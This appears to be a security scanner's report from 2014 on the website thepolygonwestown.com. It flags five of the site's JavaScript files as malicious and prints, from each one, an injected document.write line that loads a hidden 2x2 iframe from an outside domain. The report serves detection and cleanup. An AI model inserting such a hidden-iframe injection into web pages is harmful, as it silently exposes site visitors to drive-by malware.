Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thepolygonwestown.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thepolygonwestown.com/ | 200 OK Content-Length: 9472 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: allegriacairo.com ...[2501 bytes skipped]... ;/style> </head> <body> <div align="center" style="width:100%;"><div style="width:1003px; text-align:center;"> <span style="float:right; margin-right:30px; margin-top:5px" id="smap"><a href="_Disclaimer.php">Disclaimer</a> | <a href="sitemap.html">Sitemap</a></span> <div align="left" style="padding:25px;"><a href="http://allegriacairo.com/"><img src="img/Allegria-Homepage-(3)_03.jpg" width="164" height="55" border="0" /></a><img src="img/Allegria-Homepage-(4)_21.jpg" style="float:right; margin-top:15px"/> </div> <div style=" height:30px; width:1003px;"> <div style="position:absolute; z-index:1000" id="layer1"> <div id="smoothmenu1" align="left" class="ddsmoothmenu"> <ul> <li><a href="_home.php">Home</a></li> ...[8588 bytes skipped]... | ||
http://thepolygonwestown.com/JS/gallery.js | 200 OK Content-Length: 4856 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var c = 0;
var x = 0; var y = 0; var u = true; var g = true; var mode = true; var MaxNum ,MaxComment; var currentimg=0; var Go=0; function set(){ document.getElementById("screen").style.width= loadImg.length*500+"px" num=0 while(num < loadImg.length){ if(num==0){ ImgStyle="block"; }else{ ImgStyle="none"; } document.getElementById("screen").innerHTML += "<img src=' SetOpacity(document.getElementById(elemId), Math.round(parseInt(fromOpacity) + (delta * stepNum))); if (stepNum < steps) setTimeout("FadeOpacityStep('" + elemId + "', " + (stepNum+1) + ", " + steps + ", " + fromOpacity + ", " + delta + ", " + timePerStep + ");", timePerStep); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/root.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://thepolygonwestown.com/test404page.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
http://thepolygonwestown.com/JS/jquery.js | 404 Not Found Content-Length: 297 Content-Type: text/html | clean |
http://thepolygonwestown.com/JS/jquery.lightbox-0.5.js | 404 Not Found Content-Length: 310 Content-Type: text/html | clean |
http://thepolygonwestown.com/JS/ddsmoothmenu2.js | 200 OK Content-Length: 7845 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ddsmoothmenu={
arrowimages: {down:['downarrowclass','img/down.gif', 23], right:['rightarrowclass', 'img/right.gif']}, transition: {overtime:300, outtime:300}, shadow: {enable:false, offsetx:5, offsety:5}, showhidedelay: {showdelay: 100, hidedelay: 200}, detectwebkit: navigator.userAgent.toLowerCase().indexOf("applewebkit")!=-1, detectie6: document.all && !window.XMLHttpRequest, css3support: window.msPerformance || (!document.all && document.qu } this.shadow.enable=(document.all && !window.XMLHttpRequest)? false : this.shadow.enable jQuery(document).ready(function($){ if (typeof setting.contentsource=="object"){ ddsmoothmenu.getajaxmenu($, setting) } else{ ddsmoothmenu.buildmenu($, setting) } }) } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/ext_mediaplayer.js | 200 OK Content-Length: 6293 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function insertFlash( strSrc, intWidth, intHeight, strWMode, strScale, strPlayMode, strCLSID, strCODEBASE, strBGcolor, strPosition, strFlashVars )
{ if(strWMode == null || strWMode == "") strWMode = "Opaque"; if(strScale == null || strScale == "") strScale = "noscale"; if(strPlayMode == null || strPlayMode == "") strPlayMode = "true"; var strFlash = '<object classid="' + strCLSID + '" codebase="' + strCODEBASE + '" '; strFlash += ' width="' + intWidt for(m=0; m<els.length; m++){ el=FP_getObjectByID(id,els[n]); if(el) return el; } } return null; } function FP_changePropRestore() { var d=document,x; if(d.$cpe) { for(i=0; i<d.$cpe.length; i++) { x=d.$cpe[i]; if(x.v=="") x.v=""; eval("x."+x.n+"=x.v"); } d.$cpe=null; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/jquery-1.4.4.min.js | 200 OK Content-Length: 78757 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://thepolygonwestown.com/JS/jquery.prettyPhoto.js | 200 OK Content-Length: 32005 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '3.0'}; $.fn.prettyPhoto = function(pp_settings) { pp_settings = jQuery.extend({ animation_speed: 'fast', slideshow: false, autoplay_slideshow: false, opacity: 0.80, show_title: true, allow_resize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'facebook', hideflash: false, wmod name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]"); var regexS = "[\\?&]"+name+"=([^&#]*)"; var regex = new RegExp( regexS ); var results = regex.exec( url ); return ( results == null ) ? "" : results[1]; } })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thepolygonwestown.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 15 Jul 2014 05:28:17 GMT
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cj7971c5jolqcmmh4ens4ht9e1; path=/
X-Powered-By: PHP/5.1.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: thepolygonwestown.com
Referer: http://www.google.com/search?q=thepolygonwestown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.